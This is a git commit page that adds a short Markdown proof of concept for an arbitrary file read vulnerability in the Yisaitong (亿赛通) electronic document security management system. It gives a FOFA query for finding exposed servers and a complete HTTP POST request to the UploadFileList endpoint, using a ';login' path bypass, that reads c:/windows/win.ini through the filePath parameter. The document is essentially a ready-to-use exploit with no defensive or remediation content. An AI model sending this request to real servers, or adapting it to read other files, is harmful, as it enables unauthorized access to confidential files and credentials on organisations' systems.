admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Create 亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞.md

Browse Source
This commit is contained in:
wy876 2024-02-02 16:05:00 +08:00 committed by GitHub
parent e1196949bc
commit d35000e0d9
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 19 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞.md Normal file
View File

@ -0,0 +1,19 @@
## 亿赛通电子文档安全管理系统UploadFileList任意文件读取漏洞
## fofa
```
app="亿赛通-电子文档安全管理系统"
```
## poc
```
POST /CDGServer3/document/UploadFileList;login HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
command=VeiwUploadFile&filePath=c:/windows/win.ini&fileName1=hello
```